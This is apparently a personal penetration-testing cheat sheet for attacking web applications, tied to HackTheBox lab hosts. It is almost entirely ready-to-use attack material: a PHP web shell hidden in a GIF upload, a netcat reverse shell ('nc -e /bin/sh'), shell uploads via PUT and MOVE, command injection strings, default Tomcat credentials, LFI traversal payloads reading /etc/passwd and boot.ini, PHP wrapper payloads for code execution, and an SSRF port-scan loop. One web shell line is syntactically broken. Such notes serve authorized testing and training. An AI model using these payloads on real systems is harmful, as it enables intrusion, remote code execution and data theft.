Web Application
Checking HTTP Methods
curl -i -X OPTIONS http://XXXX
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Curl usage
curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"
Shell via Put Method
Put Shell
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"
RFI
$ fimap -u "http://$ip/example.php?test="
$ https://github.com/lightos/Panoptic/
JBOSS
JMX Console http://$ip:8080/jmxconcole/
Tomcat Manager Default Credentials
Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password).
Command Injection
Command injection
`id`
| id
&& id
error || id
%0a id
File upload bypass
content-type:image/gif
GIF89a <?php echo system{$_REQUEST['ippsec']); ?>
?ippsec=nc -e /bin/sh ip port
SQL Shell
msql -u root -p
\! /bin/sh
LFI
Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
Wordlists
/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt
LFI Wrappers
LFI Wrappers
expect://
http://x.x.x.x/blah?parameter=expect://whoami
data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
input://
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
LFI to RCE
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data
SSRF
for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d “\n”; done
Last modified 2yr ago